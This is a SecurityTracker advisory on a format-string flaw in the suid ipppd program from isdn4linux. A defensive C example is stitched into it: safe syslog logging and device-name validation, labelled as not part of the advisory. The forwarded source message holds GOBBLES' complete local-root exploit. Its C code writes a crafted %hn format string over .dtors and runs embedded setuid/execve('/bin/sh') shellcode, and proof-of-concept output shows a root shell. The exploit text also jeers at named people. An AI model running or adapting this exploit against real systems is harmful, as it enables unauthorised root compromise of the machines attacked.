SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
Category:   Application (Generic)  >   ipppd Vendors:   isdn4linux.org
ISDN4Linux Utils 'ipppd' Server Format String Bug May Let Local Users Gain Root Privileges
SecurityTracker Alert ID:  1005012
SecurityTracker URL:  http://securitytracker.com/id/1005012
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 10 2002
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  

Description:   A vulnerability was reported in the 'ipppd' component of the isdn4linux utils package. A local user can execute arbitrary commands, possibly with root privileges.

GOBBLES issued an exploit for a format string vulnerability in 'ipppd'. It is reported that ipppd logs the device name by passing the string directly to syslog(3) as the format argument. A local user can supply a device name that is 256 bytes or longer to reach that logging call. By providing a specially crafted string containing format directives, a local user can cause arbitrary code to be executed with elevated privileges.

On some distributions, including SuSE Linux 8.0, the application is installed with set user id (suid) root permissions. On some installations, only users in the 'dialout' group can call this program.

Demonstration exploit code is provided in the Source Message.
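The defect described above is the classic "user string used as the format" pattern. The following is an added example, not code from the advisory or from isdn4linux: it shows the hardened form of the logging call, a check that flags strings carrying printf directives, and a device-name validator that rejects overlong or malformed names before they reach the logger. The "ipppN" naming convention, the 255-byte limit and the sample device names are assumptions constructed for this example.

```c
/* Added example (not from the advisory or from isdn4linux).
 * Demonstrates safe logging of an untrusted device name, a format-directive
 * check, and a length/charset validator. Sample inputs are constructed. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <syslog.h>

/* Assumption: mirrors the 256-byte boundary the advisory cites. */
#define DEVNAME_MAX 255

/* The vulnerable pattern looks like:
 *     syslog(LOG_NOTICE, devstr);        // devstr chosen by the caller
 * gcc's -Wformat-security flags it; the safe form below passes the
 * untrusted string as data under a constant format. */
static void log_device_safe(const char *devstr)
{
    syslog(LOG_NOTICE, "%s", devstr);
}

/* Returns 1 if the string holds a '%' printf would interpret,
 * i.e. any '%' not immediately followed by another '%'. */
int contains_format_directive(const char *s)
{
    for (; *s; s++) {
        if (*s == '%') {
            if (s[1] == '%') { s++; continue; }   /* literal "%%" */
            return 1;
        }
    }
    return 0;
}

/* Accepts only "ipppN" or "/dev/ipppN" with one or more decimal digits
 * (assumed naming convention) and a total length of at most DEVNAME_MAX. */
int valid_ippp_device(const char *name)
{
    const char *p = name;
    size_t n = strlen(name);

    if (n == 0 || n > DEVNAME_MAX) return 0;
    if (strncmp(p, "/dev/", 5) == 0) p += 5;
    if (strncmp(p, "ippp", 4) != 0) return 0;
    p += 4;
    if (!isdigit((unsigned char)*p)) return 0;
    while (isdigit((unsigned char)*p)) p++;
    return *p == '\0';
}

/* Validate first, then log under a fixed format.
 * Returns 0 when the name was accepted and logged, -1 when rejected. */
int log_device_checked(const char *name)
{
    if (!valid_ippp_device(name) || contains_format_directive(name)) {
        syslog(LOG_WARNING, "rejected device name (%zu bytes)", strlen(name));
        return -1;
    }
    log_device_safe(name);
    return 0;
}

/* Builds a 300-byte constructed name (longer than the advisory's 256-byte
 * trigger length) and returns the validator's verdict for it. */
int overlong_name_result(void)
{
    char overlong[300];
    memset(overlong, 'A', sizeof overlong - 1);
    overlong[sizeof overlong - 1] = '\0';
    return log_device_checked(overlong);
}

int main(void)
{
    openlog("ippp-example", LOG_PID, LOG_USER);
    printf("ippp0        -> %d\n", log_device_checked("ippp0"));
    printf("/dev/ippp3   -> %d\n", log_device_checked("/dev/ippp3"));
    printf("ippp0%%n%%n    -> %d\n", log_device_checked("ippp0%n%n"));
    printf("300 bytes    -> %d\n", overlong_name_result());
    closelog();
    return 0;
}
```

Compiling the project's own code with `-Wformat -Wformat-security` is the quickest way to find calls of the `syslog(LOG_NOTICE, devstr)` shape; some distributions turn that warning into an error by default, which would have stopped this defect at build time.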

Impact:   A local user can execute arbitrary code on the system with elevated privileges, possibly including root privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.isdn4linux.de
Cause:   Input validation error
Underlying OS:   Linux (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(SuSE Issues Fix) ISDN4Linux Utils 'ipppd' Server Format String Bug May Let Local Users Gain Root Privileges   (Sebastian Krahmer <krahmer@suse.de>)
SuSE has released a fix.



 Source Message Contents

Date:  Fri, 9 Aug 2002 15:54:32 -0700
Subject:  [VulnWatch] Local Root Exploit



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

/*
 * GOBBLES-own-ipppd.c -- local root on SuSE 8.0
 *
 * Random Defcon Quote:
 *  "Who hired Gary Coleman to play KF at defcon?"
 *   -Anonymous
 *
 * ipppd is part of the isdn4linux-utils package and
 * is part of the default install of many linux dists.
 *
 * It is installed suid root on suse 8.0 but can only
 * be run by users in group "dialout". Luckily this
 * is a default group that normal users get added to.
 *
 * Problem:
 *
 * Classical syslog(3) format string problem.
 *
 * ipppd will log device strings in the following manner:
 *
 * main.c:
 *
 * ...
 * syslog(LOG_NOTICE,devstr);  // HARD TO SPOT BUG
 * ...
 *
 * This code is normally only reached with a valid device string,
 * but if you feed ipppd a devicename that is >= 256 bytes it
 * will merrily proceed to log this string using the faulty
 * syslog(3) call, subsequently handing over root access to the machine.
 *
 *     GENERIC FORMATSTRING EXPLOITS ARE SUPER DUPER FUN
 *
 * We're surprised that format bugs are allowed in 7350linux, but no one
 * is perfect.  Finding format bugs is a difficult task, and should be left
 * to the professionals.  A little known fact -- Paul Vixie invented
 * insecure programming.  We wanted to get this bug squashed before some
 * "researcher" from snosoft.com discovered it and tried to make some money
 * off it.  Help us in our mission to eliminate the existence of format bugs
 * in code.
 *
 * Greets:
 *  -Mark Litchfield, for helping make defcon happen.  Thanks.
 *  -Blue Boar, for his brilliant input during the Defcon Ethics Roundtable
 *   Challenge (the finest moment of defcon X)
 *  -Dean Turner, who contrary to whatever might be said, GOBBLES is not
 *   afraid of.  http://www.infonexus.com/PIX/08.01.02--defcon10/46.jpg
 *  -Eric Hines of f8labs.com, congratulations on your promotion to stockboy
 *   at Circuit City.
 *  -dice, for continuing to support the blackhat world (thanks for buying
 *   a turkey breakfast)
 *  -stealth, for making fun of the super bug.
 *  -Brian McWilliams, for thinking he knows what's up.  Hoser.
 *
 * Be careful using the Compaq TestDrive Servers -- researchers from SnoSoft
 * have compromised each and every one of those machines, and are rapidly
 * stealing other warez developed on these machines.  If you have also
 * worked with your perl -e techniques on these machines, and discovered some
 * locally exploitable stack overflows, your work may have been ripped off.
 * KF, the defcon stage, much like information security, is not for you.
 *
 * Please, help liberate dvdman!  Let him go back to maintaining
 * l33tsecurity.com, and stop raping his mind for less-than-minimum wage;
 * skill displayed on l33tsecurity.com shows this man knows what's up and
 * deserves to make a little more money, or return to the wild where he
 * can hack freely.  FREE DVDMAN!@#!@#
 *
 * (flashn has asked that the "hack.se is a bunch of nazis" statement from
 *  the defcon speech to be publicly retracted and for an apology to be
 *  issued)
 *
 */
/*
 * PROOF OF CONCEPT ON DEFAULT SuSE 8.0 INSTALL:
 *
 * $ ./GOBBLES-own-ipppd -t 0x806c864
 * [*] target @ 0x806c868
 * [*] shellcode @ 0xbfffffb5
 * sh-2.05# id
 * uid=0(root) gid=100(users) groups=100(users)
 * sh-2.05#
 *
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#define DPA		11
#define ALLIGN		3

#define IPPPD		"/usr/sbin/ipppd"
#define OBJDUMP		"/usr/bin/objdump"

void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);

extern char **environ;
char string[260];

int
main(int argc, char **argv)
{
	int dpa, aln, shift = 0;
	char opt, *tmp;
	unsigned long t, w;

	if(argc == 1) {
		fprintf(stderr, "\nUsage: \n%s -t <.dtors address>\n\n"
				"Optional:\n\t-o <word offset>\n\t-a <allignment>\n\n"
				"For the lazy:\n\t-g spits out .dtors section (use standalone)\n\n"
				, argv[0]);
		exit(0);
	}

	aln = ALLIGN;
	dpa = DPA;

	while((opt = getopt(argc, argv, "t:o:a:g")) != EOF) {
		switch(opt) {
			case 't':
				sscanf(optarg, "%p", &tmp);
				t = (long)tmp;
			 	t += 4;
				break;
			case 'a':
				aln = atoi(optarg);
				break;
			case 'o':
				dpa = atoi(optarg);
				break;
			case 'g':
				fprintf(stderr, "[*] requested objdump, this will halt any exploitation\n");
				if(execl(OBJDUMP, "objdump", "-s", "-j", ".dtors", IPPPD, NULL)) {
					fprintf(stderr, "[*] error getting .dtors section, check paths\n");
					exit(1);
				}
			default:
				fprintf(stderr, "hehehe ;PppPPPpP\n");
				exit(0);
		}
	}

	tmp = NULL;

	if((tmp = getenv("GOBBLES")) == NULL) {
		stuff();
		if(execve(argv[0], argv, environ)) {
			fprintf(stderr, "[*] error re-executing\n");
			exit(1);
		}
	}

	w = (long)tmp;
	shift = (strlen(argv[0]) - strlen(IPPPD));
	w += shift;

	fprintf(stderr, "[*] target @ %p\n[*] shellcode @ %p\n", t, w);

	buildstring(t, w, dpa, aln);

	if(execl(IPPPD, "ipppd", string, NULL)) {
		fprintf(stderr, "[*] error executing\n");
		exit(1);
	}
}


void
buildstring(unsigned long t, unsigned long w, int dpa, int aln)
{
	char a_buf[4];
	unsigned int un, deux, x, len, b[4];

	memset(string, '\0', sizeof(string));
	memset(a_buf, '\0', sizeof(a_buf));

	for(x = 0; x < aln && x < sizeof(a_buf); x++)
		a_buf[x] = 'x';

	b[0] = (t & 0x000000ff);
	b[1] = (t & 0x0000ff00) >> 8;
	b[2] = (t & 0x00ff0000) >> 16;
	b[3] = (t & 0xff000000) >> 24;

	un = (w >> 16) & 0xffff;
	deux = w & 0xffff;

	if(un < deux) {
                snprintf(string, sizeof(string)-1,
			"%s"
			"%c%c%c%c%c%c%c%c"
			"%%.%hdx" "%%%d$hn"
			"%%.%hdx" "%%%d$hn",
                        a_buf,
			b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],
                        un - (8 + aln + 5), dpa,
			deux - un, dpa + 1
		);
        }
        else {
                snprintf(string, sizeof(string)-1,
			"%s"
			"%c%c%c%c%c%c%c%c"
			"%%.%hdx" "%%%d$hn"
			"%%.%hdx" "%%%d$hn",
                        a_buf,
			b[0], b[1], b[2], b[3], b[0]+2, b[1], b[2], b[3],
                        deux - (8 + aln + 5), dpa,
			un - deux, dpa + 1
		);
        }

	len = strlen(string);
	memset(&string[len], 'x', (sizeof(string)-len-1));
}


void
stuff(void)
{
        char code[] = // the setuid 0 with the execve of the /bin/sh
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
	"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
	"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";  // In honor of Snosoft
						 // appreciate week, we
						 // too are using only
						 // Taeho Oh shellcode.
	setenv("GOBBLES", code, 1);
}


-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com

wlwEARECABwFAj1UR9YVHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPvNQA
oJ7ykXhxLAFI3diDIkN2RE/XfEdtAKC4hElIDesQgJZ6cQgZ/M6Qi4kiQQ==
=XIYS
-----END PGP SIGNATURE-----

Copyright 2012, SecurityGlobal.net LLC